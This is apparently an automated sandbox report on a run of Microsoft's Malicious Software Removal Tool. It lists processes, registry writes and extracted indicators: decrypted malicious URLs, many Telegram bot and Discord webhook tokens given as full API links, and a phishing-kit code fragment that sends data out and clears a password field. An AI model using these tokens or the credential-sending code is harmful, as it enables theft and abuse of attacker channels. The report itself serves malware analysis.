Get info about bothttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getMe

Get incoming updateshttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getUpdates

Get webhookhttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

End-Pointsendmessage

Args

chat_id (1)6481270908

text (1)","get","open","send"];

Telegram-Tokens (1)8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

Telegram-Info-Links

8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

Get info about bothttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getMe

Get incoming updateshttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getUpdates

Get webhookhttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

End-Pointsendmessage

Args

Telegram-Tokens (1)7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

Telegram-Info-Links

7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

Get info about bothttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getMe

Get incoming updateshttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getUpdates

Get webhookhttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

End-Pointsendmessage

Args

Discord-Webhook-Tokens (1)1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Discord-Info-Links

1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Get Webhook Infohttps://discord.com/api/webhooks/1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Discord-Webhook-Tokens (1)1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

Discord-Info-Links

1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

Get Webhook Infohttps://discord.com/api/webhooks/1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

Discord-Webhook-Tokens (1)1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Discord-Info-Links

1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Get Webhook Infohttps://discord.com/api/webhooks/1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Telegram-Tokens (1)6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

Telegram-Info-Links

6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

Get info about bothttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getMe

Get incoming updateshttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getUpdates

Get webhookhttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

End-Pointsendmessage

Args

chat_id (1)6643273432

text (1)new-result=>new:bynbf:=${message}`,{method:"get"}).then(success=>{},error=>{alert('messagenotsent')console.log(error)})document.getelementbyid("password").value="";console.log("yesssss")

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

201

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

2140

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=6140,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Microsoft Edge

Exit code:

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2256

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-US --service-sandbox-type=entity_extraction --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=6208,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Microsoft Edge

Exit code:

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2348

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=6884,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=6540 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.92\identity_helper.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

PWA Identity Proxy Host

Exit code:

3221226029

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\identity_helper.exe
c:\windows\system32\ntdll.dll

3152

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5816,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=5772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Microsoft Edge

Exit code:

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3488

C:\WINDOWS\System32\slui.exe -Embedding

C:\Windows\System32\slui.exe

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Activation Client

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

3976

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=4872,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=7932 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Microsoft Edge

Exit code:

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4628

"C:\WINDOWS\system32\MRT.exe"

C:\Windows\System32\MRT.exe

Windows-KB890830-x64-V5.137.exe.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Microsoft Windows Malicious Software Removal Tool

Version:

5.138.25120.1002 (f548df5fe6cfb86e2733ecc5b08b7ce51ad9dd54)

Modules

Images
c:\windows\system32\mrt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll

xor-url

(PID) Process(4628) MRT.exe

Decrypted-URLs (1)http://khamenei.cogia.net/y.phpD

(PID) Process(4628) MRT.exe

Decrypted-URLs (1)http://dawateislami.net/html/fonts/taskkill

(PID) Process(4628) MRT.exe

Decrypted-URLs (2)http://creatonprojects.com/drv32.data

http://powermpeg.com/

(PID) Process(4628) MRT.exe

Decrypted-URLs (1)http://mm.21380.com/t/sleepdown/updatew

ims-api

(PID) Process(4628) MRT.exe

Discord-Webhook-Tokens (1)1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Discord-Info-Links

1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Get Webhook Infohttps://discord.com/api/webhooks/1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8

Telegram-Info-Links

7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8

Get info about bothttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getMe

Get incoming updateshttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getUpdates

Get webhookhttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/deleteWebhook?drop_pending_updates=true

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno

Telegram-Info-Links

8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno

Get info about bothttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getMe

Get incoming updateshttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getUpdates

Get webhookhttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/deleteWebhook?drop_pending_updates=true

(PID) Process(4628) MRT.exe

Discord-Webhook-Tokens (1)757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Discord-Info-Links

757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Get Webhook Infohttps://discord.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

(PID) Process(4628) MRT.exe

Discord-Webhook-Tokens (1)770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Discord-Info-Links

770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Get Webhook Infohttps://discord.com/api/webhooks/770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

Telegram-Info-Links

6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

Get info about bothttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getMe

Get incoming updateshttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getUpdates

Get webhookhttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

End-Pointsendmessage

Args

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

Telegram-Info-Links

6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

Get info about bothttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getMe

Get incoming updateshttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getUpdates

Get webhookhttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

End-PointsendMessage

Args

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

Telegram-Info-Links

6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

Get info about bothttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getMe

Get incoming updateshttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getUpdates

Get webhookhttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

End-Pointsendmessage

Args

chat_id (1)6481270908

text (1)","get","open","send"]

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

Telegram-Info-Links

7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

Get info about bothttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getMe

Get incoming updateshttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getUpdates

Get webhookhttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

End-Pointsendmessage

Args

chat_id (1)6481270908

text (1)","get","open","send"];

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

Telegram-Info-Links

8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

Get info about bothttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getMe

Get incoming updateshttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getUpdates

Get webhookhttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

End-Pointsendmessage

Args

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

Telegram-Info-Links

7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

Get info about bothttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getMe

Get incoming updateshttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getUpdates

Get webhookhttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

End-Pointsendmessage

Args

(PID) Process(4628) MRT.exe

Discord-Webhook-Tokens (1)1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Discord-Info-Links

1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Get Webhook Infohttps://discord.com/api/webhooks/1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

(PID) Process(4628) MRT.exe

Discord-Webhook-Tokens (1)1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

Discord-Info-Links

1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

Get Webhook Infohttps://discord.com/api/webhooks/1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

(PID) Process(4628) MRT.exe

Discord-Webhook-Tokens (1)1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Discord-Info-Links

1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Get Webhook Infohttps://discord.com/api/webhooks/1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

(PID) Process(4628) MRT.exe

Telegram-Tokens (1)6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

Telegram-Info-Links

6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

Get info about bothttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getMe

Get incoming updateshttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getUpdates

Get webhookhttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

End-Pointsendmessage

Args

chat_id (1)6643273432

text (1)new-result=>new:bynbf:=${message}`,{method:"get"}).then(success=>{},error=>{alert('messagenotsent')console.log(error)})document.getelementbyid("password").value="";console.log("yesssss")

5180

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=5496,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Microsoft Edge

Exit code:

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5304

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=7924,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Microsoft Edge

Exit code:

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5356

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=5396,i,789812522186674853,10921186103817785747,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

—

msedge.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Microsoft Edge

Exit code:

Version:

133.0.3065.92

Modules

Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

112 428

Read events

112 355

Write events

Delete events

Modification events


(PID) Process:	(8880) Windows-KB890830-x64-V5.137.exe.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT
Operation:	delete value	Name:	SendFullPackage
Value:
(PID) Process:	(8988) Windows-KB890830-x64-V5.137.exe.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT
Operation:	delete value	Name:	SendFullPackage
Value:
(PID) Process:	(8988) Windows-KB890830-x64-V5.137.exe.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Update\TargetingInfo\DynamicInstalled\MSRT.amd64
Operation:	write	Name:	Version
Value: 5.138.25120.1002
(PID) Process:	(4628) MRT.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:	write	Name:	NodeSlots
Value: 020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
(PID) Process:	(4628) MRT.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:	write	Name:	MRUListEx
Value: 04000000030000000000000012000000110000000E000000100000000F0000000C0000000D0000000B000000050000000A000000090000000800000001000000070000000600000002000000FFFFFFFF
(PID) Process:	(4628) MRT.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4
Operation:	write	Name:	MRUListEx
Value: 040000000000000005000000030000000200000001000000FFFFFFFF
(PID) Process:	(4628) MRT.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\119\Shell
Operation:	write	Name:	SniffedFolderType
Value: Documents
(PID) Process:	(4628) MRT.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\119\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
Operation:	write	Name:	Mode
Value: 4
(PID) Process:	(4628) MRT.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\119\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
